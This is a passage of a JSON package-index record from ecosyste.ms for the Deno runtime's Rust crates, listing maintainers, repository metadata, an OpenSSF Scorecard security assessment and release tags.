ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:23.943Z","updated_at":"2022-11-07T18:29:23.943Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:27.208Z","updated_at":"2023-07-18T22:41:27.208Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047682,"name":"deno_web","ecosystem":"cargo","description":"Collection of Web APIs","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":297,"first_release_published_at":"2020-08-06T17:10:49.552Z","latest_release_published_at":"2026-08-27T15:20:12.590Z","latest_release_number":"0.289.0","last_synced_at":"2026-09-07T22:59:02.654Z","created_at":"2022-04-12T10:02:05.004Z","updated_at":"2026-09-07T22:59:02.654Z","registry_url":"https://crates.io/crates/deno_web/","install_command":"cargo install deno_web","documentation_url":"https://docs.rs/deno_web/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/den